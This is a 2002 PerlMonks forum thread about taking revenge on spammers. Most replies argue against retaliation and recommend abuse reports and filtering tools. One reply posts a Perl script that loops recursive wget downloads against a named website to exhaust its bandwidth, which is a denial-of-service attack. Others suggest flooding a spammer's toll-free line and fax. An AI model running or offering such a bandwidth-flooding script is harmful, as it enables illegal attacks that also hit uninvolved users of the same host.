Beefy Boxes and Bandwidth Generously Provided by pair Networks
laziness, impatience, and hubris

Spam revenge

by alexiskb (Acolyte)
on Sep 03, 2002 at 09:53 UTC ( #194714=perlquestion: print w/replies, xml ) Need Help??

alexiskb has asked for the wisdom of the Perl Monks concerning the following question:

This node falls below the community's threshold of quality. You may see it by logging in.

Replies are listed 'Best First'.
Re: Spam revenge
by Sinister (Friar) on Sep 03, 2002 at 10:51 UTC
    The only sane thing to suggest here is : find out who the ISP to this domain is, and send a little note to abuse@isp_name_here.tld

    er formait hyarya.
    -- "Life is a house and the next tornado is never far away"
    -- "lovely by nature"

Re: Spam revenge
by t0mas (Priest) on Sep 03, 2002 at 11:30 UTC
    Paul Graham have written a great article (from a Lisp point of view) about spam-filtering thats worth a look, if you want to re-think your spam-handling-strategy. Contains loads of useful links.
    Maybe "getting back" isn't the right way to accomplish what you are after, a spam free life....

    /brother t0mas
      Thanks i will have a look, damn, i lost 13+ rep points! i feel like ive been spammed again!

      I have done the abuse email lookup...

      and its only the ones that continue to spam that i am pursuing, ah well, thanks for the links...!

      It would be great to get a script that could read the headers on a spam email and then send a copy autmatically to the relevant abuse addresses ( detecting fakes etc ) and also does a whois and automatically emails all the contacts at the various servers along the way...

      i guess i got carried away with this new law looming:!

      Electronic Frontier Foundation Action Alert!

      (Issued: August 2, 2002)!

      Representative Howard Berman has introduced legislation that would grant copyright holders near-immunity from the law while attacking a citizen's computer. The bill protects copyright holders from legal action stemming from denial-of-service attacks on people whom they suspect of using material in an unauthorized way on a peer-to-peer (P2P) network. In a ridiculously vague caveat, Berman's bill graciously says that the availability of your other files may not be impaired unless "reasonably necessary."
        alexiskb writes:

        damn, i lost 13+ rep points! i feel like ive been spammed again!

        It would seem the monks of this house don't approve of your understandable but misguided desire for revenge.

        Likewise, neither do I, but in the spirt of "less heat, more light" I'll offer the following:

        1. Look into SpamAssassin for state-of-the-art filtering
        2. And Spam Cop is a system that does an excellent job of parsing spam and routing complaints to the appropriate party.

        Fight spam, yes, but don't descend to their level.


Re: Spam revenge
by tadman (Prior) on Sep 03, 2002 at 12:24 UTC
    Considering that's now a crime in many countries, I'd say you're asking for trouble in even talking about it. When it comes to UCE, the best way to prevent it is by filtration. If the messages aren't read, the incentive for sending them is reduced.

    You might want to read about a recent project, such as Bayesian Filtering for Spam. These are constructive solutions to the problem, quite the opposite of what you're suggesting. Passive resistance is a lot better than waging a war that is likely to have a lot of so-called collateral damage.
      I stand corrected, i guess freedom of speech is what the net is all about... i will try to exercise more restraint next time i get a breast size enhancement email.
        Don't get me wrong, it's not a simple case of freedom of speech, since in many US states, UCE is illegal, just like junk faxes. You have a right to legal remedy, such as this example of someone suing the spammer

        If you just start randomly hacking things, or trying to deny service to someone's Web site just because they sent you UCE, you're going to inconvenience a lot more people than the marketer. The ISP might have many legitimate customers that could ne knocked out by your actions.

        If you don't read UCE, and especially, don't buy their products, the business incentive behind sending it diminishes. Spam filters and blacklists are starting to have a real monetary effect on spammers, and the more people band together to try and control this sotr of activity, the better off we'll all be.

        If everyone took matters in to their own hands, you can imagine the chaos.
Re: Spam revenge
by Aristotle (Chancellor) on Sep 03, 2002 at 13:08 UTC
    Add a rule to your .procmailrc to filter email with that URL in the body and get on with life.

    Makeshifts last the longest.

        Add a rule to your .procmailrc to filter email with that URL in the body and get on with life.

      Better to LART or at least blacklist the spammer... "just filter it" does nothing to combat theft of resources (bandwidth and cycles on the mail server). And who knows, maybe a particularly intelligent spammer will take you off their list if they get enough 551 go fsck yourself replies from sendmail....

      F o x t r o t U n i f o r m
      Found a typo in this node? /msg me
      The hell with paco, vote for Erudil!

        Unfortunately the headers are forged most of the time.
        If the ad contains an 800 number, better to call repeatedly and ask very stupid and annoying question, very slowly. 800 calls cost actual money. Or you could fax their fax with a nice message in a 200pt font repeatedly.


        "To be civilized is to deny one's nature."

        shotgunefx beat me to it.. the problem is that most of the time, spammers don't even care about what comes back. They fire off a few million mails and simply don't care at all about how many of them get rejected, bounced, filtered or otherwise don't reach their destination because if even 0.01% of recipients do react to these mails, they've at least broken even, if not made a profit. It simply doesn't matter whether you bounce a spam mail, sendmail rejects it, or whatever. The only way to combat theft of resources is to silently filter spam as close to the source as possible.

        .procmailrc is just available to anyone, while the system's sendmail configuration may not be. If you do have access to it, all the better.

        Makeshifts last the longest.

Re: Spam revenge
by alexiskb (Acolyte) on Sep 03, 2002 at 10:07 UTC
    okay okay, im sorry. i will suffer in silence...
      ok, reputation suicide. I know, but what can I do?

      First I check what is the spammer hosting (dig sitename)
      then I go to the hosting and see how much they charge for bandwidth...
      having a DSL with no limits it is really handy.
      then it is just a matter of using the bellow

      #!/usr/bin/perl -w $SIG{HUP} = \&end_it_all; $SIG{TERM} = \&end_it_all; $SIG{INT} = \&end_it_all; $SIG{QUIT} = \&end_it_all; $count = 0; $host = "www.BIOPROTEC.COM.BR"; while (1) { $exit = system("wget -r -l100 -U \"Stop sending me SPAM! This is the o +nly way to make you undestand.\" http://$host"); $count ++; if ($exit) { &end_it_all; } } sub end_it_all() { print "\n did some funny things some $count times... naughty, naught +y\n"; exit(0); }
        What's the point in writing Perl to drive a static wget call? Either write bash or use LWP::Parallel::UserAgent. Better yet, find something that's more worth your while to code.

        Makeshifts last the longest.

Re: Spam revenge
by zaimoni (Beadle) on Sep 03, 2002 at 23:32 UTC

    Does the attack go entirely through nations (including starting and ending servers) where maliciously hacking servers is legal? (The Phillipines is promising: hacking is legally undefined (thus legal) there. Fortunately, even the Phillipines pays attention to property damage).

    If not, may I suggest something more effective: a UCE bouncer email client. Apple's default email client for OS X has this feature (manually configured), so it should be legal most places. (The client must, of course, use the real from path, rather than the From: header, which is worthless.)

    Even if the UCE specialist used 3rd party relay to launch his emails, you would be motivating that ISP to fix their config files. Otherwise, you're persuading the UCE specialist to remove the dead email.

      In fact, UCE is illegal in many countries; I'm not sure about its status in the US, but I think I heard that it is there as well. It has been banned by law in Germany a long time ago, although that has of course not decreased the amount of foreign spam. Even not given those laws though I don't see how UCE bouncing could ever be construed as illegal.

      Makeshifts last the longest.

        UCE is legal in the U.S. with the condition that a functional opt-out URL be provided in all instances of the UCE. (Such a URL is an email validator, alas. This actually makes things easier for UCE specialists, since there is no particular requirement to remove the email address from other email lists.)

        However, the Federal law explicitly legalizing UCE is fairly recent (late 2001?). Violations are the domain of the U.S. FTC.

Re: Spam revenge
by shotgunefx (Parson) on Sep 03, 2002 at 15:24 UTC
    While I personally wouldn't do it due to liability, a look at CERT and other places were server security is discussed is always thought provoking... and good for increasing your whitehat skills. You should always try the normal channels (abuse@ etc) though many times it doens't work.

    I understand your frustration, I deal with hundreds of SPAM a day. I wish some of these f***s were local so I could pay them a visit.

    That being said, it's probably not worth it. (trying to DOS them that is.)

    "To be civilized is to deny one's nature."

Log In?

What's my password?
Create A New User
Domain Nodelet?
Node Status?
node history
Node Type: perlquestion [id://194714]
Approved by shotgunefx
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others lurking in the Monastery: (6)
As of 2022-05-27 12:07 GMT
Find Nodes?
    Voting Booth?
    Do you prefer to work remotely?

    Results (94 votes). Check out past polls.